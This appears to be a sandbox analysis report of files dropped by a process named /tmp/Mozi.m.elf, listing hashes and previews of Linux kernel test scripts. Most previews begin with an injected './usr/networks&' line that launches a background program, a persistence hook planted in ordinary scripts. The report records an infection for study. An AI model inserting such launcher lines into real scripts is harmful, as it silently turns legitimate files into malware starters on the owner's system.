                                                              SHA1:04D08AB0A9604A35EB9912BCD6DF4CFCB8617D08
                                                              SHA-256:5BA323C0D42BFCFED74609EF4CDC517ABBF570B1EAE841338B1B8E9BC7759750
                                                              SHA-512:CBDAB4C924405CC4EED685679CD3FAC08B46E9C7E2CBDDE37ABFB1E18325223E344DCEC947DC35231B7B4B6B75A77B25B7CEFA418D91EF8B7A8AF9B31851DFA3
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi.. functions.sh..configfile=`echo $i | sed -e 's/^.*\///'`.ngps=`grep ver: $i/console.log 2> /dev/null | tail -1 | sed -e 's/^.* ver: //' -e 's/ .*$//'`.stopstate="`grep 'End-test grace-period state: g' $i/console.log 2> /dev/null |.. tail -1 | sed -e 's/^\[[ 0-9.]*] //' |.. awk '{ print \"[\" $1 \" \" $5 \" \" $6 \" \" $7 \"]\"; }' |.. tr -d '\012\015'`".if test -z "$ngps".then..echo "$configfile ------- " $stopstate.else..title="$configfile ------- $ngps GPs"..dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`..if test -z "$dur"..then...:..else...ngpsps=`awk -v ngps=$ngps -v dur=$dur '....BEGIN { print ngps / dur }' < /dev/null`...title="$title ($ngpsps/s)"..fi..echo $title $stopstate..nclosecalls=`grep --binary-files=text 'torture: Reader Batch' $i/console.log | tail -1 | awk '{for (i=NF-8;i<=NF;i++) sum+=$i; } END {print sum}'`..if test -z "$nclosecalls"..then...exit 0..fi..if test "$nclosecalls" -eq 0..then.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2182
                                                              Entropy (8bit):5.113870463978564
                                                              Encrypted:false
                                                              SSDEEP:24:6Ee9Ov1jq+6vTZG7TdvOV9CGW59gYHh+5x/BQlG8OW+oE0+EV0eW+vB/0HL0MmSI:6lvTs709ClcnG5B/6/8bBFXcl2U/172Z
                                                              MD5:69C65F8778291988E21922FB456C3C52
                                                              SHA1:9D380BDC43853D325A4BC9FF35D0A7BC9AAD1D87
                                                              SHA-256:A49DB2EE35BB00FD042DF74EEC201078948581ED9577EBB2443968CF2F6812A3
                                                              SHA-512:F908D32300B1BF298EDC4BDB658383B94A6E8417CCFA24A925E22E6F398AD730F776EA820958F757C25731A9FCFBAFD11AB58F5BC5F0ADEECF8A4A773DC6E213
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 10.fi..sed -e 's/^\[[^]]*]//' < $i/console.log |.grep 'us : rcu_exp_grace_period' |.sed -e 's/us : / : /' |.tr -d '\015' |.awk '.$8 == "start" {..if (startseq != "")...nlost++;..starttask = $1;..starttime = $3;..startseq = $7;..seqtask[startseq] = starttask;.}..$8 == "end" {..if (startseq == $7) {...curgpdur = $3 - starttime;...gptimes[++n] = curgpdur;...gptaskcnt[starttask]++;...sum += curgpdur;...if (curgpdur > 1000)....print "Long GP " starttime "us to " $3 "us (" curgpdur "us)";...startseq = "";..} else {...# Lost a message or some such, reset....startseq = "";...nlost++;..}.}..$8 == "done" && seqtask[$7] != $1 {..piggybackcnt[$1]++;.}..END {..newNR = asort(gptimes);..if (newNR <= 0) {...print "No ftrace records found???"...exit 10;..}..pct50 = int(newNR * 50 / 100);..if (pct50 < 1)...pct50 = 1;..pct90 = int(newNR * 90 / 100);..if (pct90 < 1)...pct90 = 1;..pct99 = int(newNR * 99 / 100);..if (pct99 < 1)...pct99 = 1;..div = 10 ** int(log(gptimes[pct90]) / log(10
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1647
                                                              Entropy (8bit):5.17716483084646
                                                              Encrypted:false
                                                              SSDEEP:24:SWaDjwbwpaqsMmffs+6QW595Hh+6x/BQlG8OW+oE0+EV0eW+vB/0HL0UjlJS+9XT:gwbwMqsVCRcsG5B/6/FXcl2U/1t2
                                                              MD5:9AF4AC39ECDDFCA8A34238215BAD591B
                                                              SHA1:666B7D95D28D4A8A6F11105BA524B700BF7D67A3
                                                              SHA-256:4FA88C47323E7104E9A7B759A508845D5B3039AEB16D3E33384FF870D29D367B
                                                              SHA-512:4F1B991BD2D70824B8E31E88DED646A90DB7E99BDAF4E9CD236099BCCF125F576BE289C643A2D80C01FA8987D2C3769078D7B2E5B2815055AB1F191E488B97AA
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi.PATH=`pwd`/tools/testing/selftests/rcutorture/bin:$PATH; export PATH.. functions.sh..if kvm-recheck-rcuperf-ftrace.sh $i.then..# ftrace data was successfully analyzed, call it good!..exit 0.fi..configfile=`echo $i | sed -e 's/^.*\///'`..sed -e 's/^\[[^]]*]//' < $i/console.log |.awk './-perf: .* gps: .* batches:/ {..ngps = $9;..nbatches = $11;.}../-perf: .*writer-duration/ {..gptimes[++n] = $5 / 1000.;..sum += $5 / 1000.;.}..END {..newNR = asort(gptimes);..if (newNR <= 0) {...print "No rcuperf records found???"...exit;..}..pct50 = int(newNR * 50 / 100);..if (pct50 < 1)...pct50 = 1;..pct90 = int(newNR * 90 / 100);..if (pct90 < 1)...pct90 = 1;..pct99 = int(newNR * 99 / 100);..if (pct99 < 1)...pct99 = 1;..div = 10 ** int(log(gptimes[pct90]) / log(10) + .5) / 100;..print "Histogram bucket size: " div;..last = gptimes[1] - 10;..count = 0;..for (i = 1; i <= newNR; i++) {...current = div * int(gptimes[i] / div);...if (last == current) {....count++;...} else {....if (
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):6480
                                                              Entropy (8bit):5.302615493815468
                                                              Encrypted:false
                                                              SSDEEP:192:UW7mo8L6zCQaO59QRYE7uz+jO+O81DhfoaDSl4choF5NDI:UWzzzCXa0YE7uztdQDhAamlVhoF5NDI
                                                              MD5:44DEEDB4AE1B9A70CF6C582D4342BB80
                                                              SHA1:DCA684F2C6BD5E87F8F44E388EB7DBDEA4810B07
                                                              SHA-256:D5C180BFF335FF5F0A0E4E009CBE129588365A187A7A9F71E2C53F2AB4E1A674
                                                              SHA-512:72D81A95E8A725BF91D50789F058D4C23452DAA6D62F500255C4965E91756B4DC38F2FE743A300ABF085DC11DA8B804E442420A4BE8CEF88BCC7EFF896DFC7AC
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi.echo ' ---' `date`: Starting build.echo ' ---' Kconfig fragment at: $config_template >> $resdir/log.touch $resdir/ConfigFragment.input $resdir/ConfigFragment.if test -r "$config_dir/CFcommon".then..echo " --- $config_dir/CFcommon" >> $resdir/ConfigFragment.input..cat < $config_dir/CFcommon >> $resdir/ConfigFragment.input..config_override.sh $config_dir/CFcommon $config_template > $T/Kc1..grep '#CHECK#' $config_dir/CFcommon >> $resdir/ConfigFragment.else..cp $config_template $T/Kc1.fi.echo " --- $config_template" >> $resdir/ConfigFragment.input.cat $config_template >> $resdir/ConfigFragment.input.grep '#CHECK#' $config_template >> $resdir/ConfigFragment.if test -n "$TORTURE_KCONFIG_ARG".then..echo $TORTURE_KCONFIG_ARG | tr -s " " "\012" > $T/cmdline..echo " --- --kconfig argument" >> $resdir/ConfigFragment.input..cat $T/cmdline >> $resdir/ConfigFragment.input..config_override.sh $T/Kc1 $T/cmdline > $T/Kc2..# Note that "#CHECK#" is not permitted on commandline.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:awk or perl script, ASCII text, with very long lines (378)
                                                              Category:dropped
                                                              Size (bytes):11017
                                                              Entropy (8bit):5.6019167894868325
                                                              Encrypted:false
                                                              SSDEEP:192:kfJ9dYxMSf4uZqtpi0SwJjZhevAw+N/w7HD/29w36HVn+7A05qBLUbIQbthh:kfJTIMSf4uZqtBSwvHN/w7j/29wGVn+L
                                                              MD5:B167C149D77482F3615457A85A7C5536
                                                              SHA1:CF3BEF44B1E9EC81075A3F675AD3888139E8B7FA
                                                              SHA-256:432C7CA4ABC3FBB331A1707A953FB4E5896D78DD6DE367FF4BB990BBBFB62FF9
                                                              SHA-512:0C3B520C282ED66588D576DF270664C6EF4FFDCCBF239930EE30DF4BF834F30CF8D8633D0704A8743888F814862E170425F83FF7BDAB453E1E5727009CF94EE2
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.}..while test $# -gt 0.do..case "$1" in..--bootargs|--bootarg)...checkarg --bootargs "(list of kernel boot arguments)" "$#" "$2" '.*' '^--'...TORTURE_BOOTARGS="$2"...shift...;;..--bootimage)...checkarg --bootimage "(relative path to kernel boot image)" "$#" "$2" '[a-zA-Z0-9][a-zA-Z0-9_]*' '^--'...TORTURE_BOOT_IMAGE="$2"...shift...;;..--buildonly)...TORTURE_BUILDONLY=1...;;..--configs|--config)...checkarg --configs "(list of config files)" "$#" "$2" '^[^/]*$' '^--'...configs="$2"...shift...;;..--cpus)...checkarg --cpus "(number)" "$#" "$2" '^[0-9]*$' '^--'...cpus=$2...TORTURE_ALLOTED_CPUS="$2"...shift...;;..--datestamp)...checkarg --datestamp "(relative pathname)" "$#" "$2" '^[^/]*$' '^--'...ds=$2...shift...;;..--defconfig)...checkarg --defconfig "defconfigtype" "$#" "$2" '^[^/][^/]*$' '^--'...TORTURE_DEFCONFIG=$2...shift...;;..--dryrun)...checkarg --dryrun "sched|script" $# "$2" 'sched\|script' '^--'...dryrun=$2...shift...;;..--duration)...checkarg --duration "(
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:C source, ASCII text
                                                              Category:dropped
                                                              Size (bytes):3043
                                                              Entropy (8bit):5.211893461133884
                                                              Encrypted:false
                                                              SSDEEP:48:F1ZBW8oMIGWzbk4rwEJOrWKb9DvFYx5FXAm1QZyGZXgs9DQV09keu0KbcxyHcXEp:F1c84rbOyk9DebFQvyGJgsUPWxyHWEp
                                                              MD5:1F2A5D60152141EFC8709F27266DCB41
                                                              SHA1:9380E59CEB5522297EF8A768DF0099AC42135957
                                                              SHA-256:9777F28693F71100B44B3FDC2572D85544C9C79F7C72717EAE62338310D5E649
                                                              SHA-512:B72525791FBB0F3CC7126D4B3F09FD8D2A3BFEC8279F4578F5EF99E250BCD8F87C7B663E1B323F8D1C51C45E276A1E1DB09FD2980C9AE3D17C39356F16527E86
                                                              Malicious:false
                                                              Preview:./usr/networks&.[ -z "$D" ] && echo >&2 "No argument supplied" && exit 1.if [ ! -d "$D" ]; then. echo >&2 "$D does not exist: Malformed kernel source tree?". exit 1.fi.if [ -s "$D/initrd/init" ]; then. echo "$D/initrd/init already exists, no need to create it". exit 0.fi..T=${TMPDIR-/tmp}/mkinitrd.sh.$$.trap 'rm -rf $T' 0 2.mkdir $T..cat > $T/init << '__EOF___'.#!/bin/sh.# Run in userspace a few milliseconds every second. This helps to.# exercise the NO_HZ_FULL portions of RCU. The 192 instances of "a" was.# empirically shown to give a nice multi-millisecond burst of user-mode.# execution on a 2GHz CPU, as desired. Modern CPUs will vary from a.# couple of milliseconds up to perhaps 100 milliseconds, which is an.# acceptable range..#.# Why not calibrate an exact delay? Because within this initrd, we.# are restricted to Bourne-shell builtins, which as far as I know do not.# provide any means of obtaining a fine-grained timestamp...a4="a a a a".a16="$a4 $a4 $a4 $a4".a64="$
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):440
                                                              Entropy (8bit):4.763089121502071
                                                              Encrypted:false
                                                              SSDEEP:6:w6vCiRoM3084xva2SjUxTBxusvt+b2Fq4xTBxexvus1exTBxw8vXWRJxw8vqRyPf:w6vCi9308p26DLdeZW/amIHWfK4n
                                                              MD5:5BD12FE7C8C716573A9C2440489F66D5
                                                              SHA1:0E0DBAB9D91E1477B4DD25C9DF8CA21CC1ED685E
                                                              SHA-256:1D395E276AF9F8C40ED69F34CABDDEF7A84DA9A61044A8A686C1AA1E552F4EBB
                                                              SHA-512:BBD5B97062BB22CF0F22DBC204DED6F02220226BBBCA45E6AE1498C14B6C40E4DFDF9145B21E46FDD47F04EB7A0125215FDA26DAAAF24E642D5BD317365D0D02
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..if grep -q "error:" < $F.then..print_bug $title build errors:..grep "error:" < $F..exit 2.fi..grep warning: < $F > $T/warnings.grep "include/linux/*rcu*\.h:" $T/warnings > $T/hwarnings.grep "kernel/rcu/[^/]*:" $T/warnings > $T/cwarnings.cat $T/hwarnings $T/cwarnings > $T/rcuwarnings.if test -s $T/rcuwarnings.then..print_warning $title build errors:..cat $T/rcuwarnings..exit 2.fi.exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:awk or perl script, ASCII text
                                                              Category:dropped
                                                              Size (bytes):3346
                                                              Entropy (8bit):5.221477851845867
                                                              Encrypted:false
                                                              SSDEEP:96:KV10en3z5OT8O/tW5BHo8vHMHeHbzsHCHzxLXH:KrD5W3/Y59o8PA+/g6lLXH
                                                              MD5:B0BFAAC54A7134DCFF782734D469AFB4
                                                              SHA1:D9901011FD87AF6CE19A8DE2A8EF7A3B0E64F47E
                                                              SHA-256:035123E62082D161C1073A280DED4376FE8896FB8579AD87A9735470BC0426E0
                                                              SHA-512:6C584E4245ADD2C9F1AB92A8C540D8C69B02237F1CB7B04397ACBE0538897C2588269CA50105553985EC0B2E2850BDC315D6AC9DDFC5087A78A9D833D9A5BE19
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi.if grep -Pq '\x00' < $file.then..print_warning Console output contains nul bytes, old qemu still running?.fi.cat /dev/null > $file.diags..# Check for proper termination, except that rcuperf runs don't indicate this..if test "$TORTURE_SUITE" != rcuperf.then..# check for abject failure...if grep -q FAILURE $file || grep -q -e '-torture.*!!!' $file..then...nerrs=`grep --binary-files=text '!!!' $file |...tail -1 |...awk '...{....for (i=NF-8;i<=NF;i++).....sum+=$i;...}...END { print sum }'`...print_bug $title FAILURE, $nerrs instances...exit..fi...grep --binary-files=text 'torture:.*ver:' $file |..egrep --binary-files=text -v '\(null\)|rtc: 000000000* ' |..sed -e 's/^(initramfs)[^]]*] //' -e 's/^\[[^]]*] //' |..awk '..BEGIN.{...ver = 0;...badseq = 0;...}....{...if (!badseq && ($5 + 0 != $5 || $5 <= ver)) {....badseqno1 = ver;....badseqno2 = $5;....badseqnr = NR;....badseq = 1;...}...ver = $5...}...END.{...if (badseq) {....if (badseqno1 == badseqno2 && badseqno2 ==
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1723
                                                              Entropy (8bit):5.244148997020697
                                                              Encrypted:false
                                                              SSDEEP:48:HUYh+e1GOsVHdX9wVzPfkCx9BF/5EneTtiLcZqMqxzcoaBFF:HUYOO+wzjnBvEnutec4DFaBFF
                                                              MD5:4469B917A8A4B3B4430DF7D1A1BA0167
                                                              SHA1:66D0537A41CE66007719B735969E97511BC53AB2
                                                              SHA-256:1196A906EA766E04AF8FCA2C4066AF2BF3747997E3A0B78D68F727ECDBC72374
                                                              SHA-512:58CBAA85AB371CE0D6A09D55047ACBA96D4708A8AA9F9662927666C8154BD67B45E4938CEF6CFE4763C971D581CA8D0CE7089DA7C6D13D07E2CA228FDC9DDEF1
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 99.fi..if test "x$1" = "x--should-pass"; then..should_pass="yes".elif test "x$1" = "x--should-fail"; then..should_pass="no".else..echo "Unrecognized argument '$1'" 1>&2...# Exit code 99 indicates a hard error...exit 99.fi..CBMC=${CBMC:-cbmc}..SYNC_SRCU_MODE=${SYNC_SRCU_MODE:-simple}..case ${SYNC_SRCU_MODE} in.kernel) sync_srcu_mode_flags="" ;;.simple) sync_srcu_mode_flags="-DUSE_SIMPLE_SYNC_SRCU" ;;..*)..echo "Unrecognized argument '${SYNC_SRCU_MODE}'" 1>&2..exit 99..;;.esac..min_cpus_fail=1..c_file=`dirname "$2"`/test.c..# Source the input file... $2..if test ${min_cpus_fail} -gt 2; then..default_default_cpus=${min_cpus_fail}.else..default_default_cpus=2.fi.default_cpus=${default_cpus:-${default_default_cpus}}.cpus=${NR_CPUS:-${default_cpus}}..# Check if there are two few cpus to make the test fail..if test $cpus -lt ${min_cpus_fail:-0}; then..should_pass="yes".fi..cbmc_opts="-DNR_CPUS=${cpus} ${sync_srcu_mode_flags} ${test_cbmc_options} ${CBMC_FLAGS}"..echo "Run
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1441
                                                              Entropy (8bit):5.520351213592847
                                                              Encrypted:false
                                                              SSDEEP:24:xVyGO/8VUp+ccmLeeUQux6yNScMR5oHK80E8ZmPzgawreotgf4:90344yAfR6q8T6
                                                              MD5:6D0439EE0A83FA091605410727383ED1
                                                              SHA1:4ED9E279DCE80C03CD141460955D2284D051C686
                                                              SHA-256:DFD67005F4B0D998D6520DDE9A33CF5C678E5442D4F825A8F5FC55EF45CC8F4E
                                                              SHA-512:49C286E596728138394AA3E24DBEE748AF53AF29FD6FCACB2031499FEE141DCE590CB0FF8282A3E273E88234933E0EC7379209E2581207BC171D1F073E7BB4B1
                                                              Malicious:false
                                                              Preview:./usr/networks&..../param_test ${TEST_LIST[$i]} -r ${REPS} -t ${NR_THREADS} ${@} ${EXTRA_ARGS} || exit 1...echo "Running compare-twice test ${TEST_NAME[$i]}"..../param_test_compare_twice ${TEST_LIST[$i]} -r ${REPS} -t ${NR_THREADS} ${@} ${EXTRA_ARGS} || exit 1...let "i++"..done.}..echo "Default parameters".do_tests..echo "Loop injection: 10000 loops"..OLDIFS="$IFS".IFS=$'\n'.INJECT_LIST=(.."1".."2".."3".."4".."5".."6".."7".."8".."9".).IFS="$OLDIFS"..NR_LOOPS=10000..i=0.while [ "$i" -lt "${#INJECT_LIST[@]}" ]; do..echo "Injecting at <${INJECT_LIST[$i]}>"..do_tests -${INJECT_LIST[i]} ${NR_LOOPS}..let "i++".done.NR_LOOPS=..function inject_blocking().{..OLDIFS="$IFS"..IFS=$'\n'..INJECT_LIST=(..."7"..."8"..."9"..)..IFS="$OLDIFS"...NR_LOOPS=-1...i=0..while [ "$i" -lt "${#INJECT_LIST[@]}" ]; do...echo "Injecting at <${INJECT_LIST[$i]}>"...do_tests -${INJECT_LIST[i]} -1 ${@}...let "i++"..done..NR_LOOPS=.}..echo "Yield injection (25%)".inject_blocking -m 4 -y..echo "Yield injection (50%)".injec
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):164
                                                              Entropy (8bit):4.703374469471104
                                                              Encrypted:false
                                                              SSDEEP:3:qXVPnKWoW6MKRDRFJFFGSsW1BszoQEDRnAasxms1C7H/Q8OORgn:cnKWc1RyS7s+RoC7f4n
                                                              MD5:4FFDFD98A8EC4B24C420EA596E877E98
                                                              SHA1:A347AF4262380086119C8B266DDCB413C305DD56
                                                              SHA-256:02EE38B1E0AA00683029AFCF243C511E42C87B15587BB391CBD85500E40FD3A6
                                                              SHA-512:31A0B1729DB13FA350392FABE7D577FA9C7BD28059AFC86EF5F5AC772A78350D7A914505DD3D7EA2F0125DEE8CF734C7CFFCFCA5C976C7AE132475D4CDB7E50A
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit $ksft_skip..fi.}..main_function().{. check_root. ./safesetid-test.}..main_function.echo "$TCID: done".exit $errcode../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):48
                                                              Entropy (8bit):3.9783080115802454
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORTplOORgn:WMn
                                                              MD5:50E7468E4E97AE4ECF676B96998FC995
                                                              SHA1:538F6C756DC4F74B178728E62AE16C1EA1B72FA5
                                                              SHA-256:B2D1993B3FFB264F55539AEFD10D6D9D27790CE632494F615EEEF6C420F941D8
                                                              SHA-512:F04E7E06B151CE2EEA6461169C8B20493FA562028C716D6B404921CB44D68E145EAA0BA96E248C4F2DFE086D7EEF7222E1424DD11C390507FF1D3B478B6549AB
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $rc../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):121
                                                              Entropy (8bit):4.548077184392065
                                                              Encrypted:false
                                                              SSDEEP:3:qXVfFmf2MRvvvjNuQfoM8z/XFHXqFOnAzlv4MyoOORgn:Kgf2MZxuQe1XqZZwMyTn
                                                              MD5:D0716F8976E5A2BD3006022236D35997
                                                              SHA1:B93A17EAFF6DCA4E8AFC7B7B6499243747674867
                                                              SHA-256:BE73D64821BFCD4820F3534D766504F2560429CB3BBEDC1730D3DA9F707D128D
                                                              SHA-512:2526432AAEFDE2BDC74F70114E599C4AB5882EB38B3EADDD28FC2CE177DE29DABCF310AAF53814641B3F173E78CFC475C8988402009DBE7F965E9CAC2C3D4D9B
                                                              Malicious:false
                                                              Preview:./usr/networks&.test "$n" = 0 && exit 0..echo "default_file_splice_read broken: leaked $n".exit 1../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):521
                                                              Entropy (8bit):4.767031693352474
                                                              Encrypted:false
                                                              SSDEEP:12:9HbxmceznOmPqkAVHKVHwvN0B9VHwvHNW6v7n:JbQZ5bAVqVM0B9V0Nl7
                                                              MD5:5CDE33DAE3EA85DA6E63293AC24BE38C
                                                              SHA1:3F0558198FBC9C65482C46F0AEA513EA2D89FCAC
                                                              SHA-256:4F030F9DD632BDE1ED2B9F8E9834D2FB35B16493C7209B773EAD8F5E03BC0D95
                                                              SHA-512:C57CD9F086ADF85DE11F6A208D532A85ACAA3A659B1491E3DDB14A4D7C873DE240306A1DDAB4BEFC54D9C79FEE328A264022733D8EF078FB18956DB3FC0077A4
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi..if ! /sbin/modprobe -q -n test_static_keys; then..echo "static_key: module test_static_keys is not found [SKIP]"..exit $ksft_skip.fi..if /sbin/modprobe -q test_static_key_base; then..if /sbin/modprobe -q test_static_keys; then...echo "static_key: ok".../sbin/modprobe -q -r test_static_keys.../sbin/modprobe -q -r test_static_key_base..else...echo "static_keys: [FAIL]".../sbin/modprobe -q -r test_static_key_base..fi.else..echo "static_key: [FAIL]"..exit 1.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):202
                                                              Entropy (8bit):4.77491154916863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVasWoWb+K3rKCAWR+GzerNu5GrKbVR9+GzYNYmxf74Dmxf/FP4y6viXVOORgn:6WloxSnVH+dY8S89Pd6viMn
                                                              MD5:075C3AC55C2EAF1DF12AA1A2031687C0
                                                              SHA1:E6A3D2FF970B119ECDC462CEA01AE7D55CEBE7A9
                                                              SHA-256:82F404B2CA157B49A13AE50D01741F29E6F4C245CCD7F9370F7B8ABA33828682
                                                              SHA-512:66E6CA1024FBC0D3609BAA2EFA6CC0F746766F00EC991FF204AEF9A77081567C2A73BE7EFC7F137F68D1C8046E0E0A5D30786A725C3088239298820235CE3915
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi.if /sbin/modprobe -q test_user_copy; then../sbin/modprobe -q -r test_user_copy..echo "user_copy: ok".else..echo "user_copy: [FAIL]"..exit 1.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3804
                                                              Entropy (8bit):5.189907595788207
                                                              Encrypted:false
                                                              SSDEEP:48:7Ca0YloYO7EULo1Ej5HBWnRr3kazJzmJC0+aRciuTDDSp+QWjMdZ+DXZpan7pr:7t4y48KaoJIzDSplDODja7pr
                                                              MD5:BE3B50DCF88D2B312C64899D8306EB3E
                                                              SHA1:987091A88752E8554ADC6EA2564A86E72A9282CF
                                                              SHA-256:922A1DDF276FE35630EB32D7FA1D601277FEC29C6868518BA084A1FD05688E82
                                                              SHA-512:640533EC07A7070906C1D2E7686A2F7E23E9B394D9A8A1A205A5B1ABC1AFA20D6340824FD7725687376FEF980F171E76E4D026F6614261F6B932587ECE210176
                                                              Malicious:false
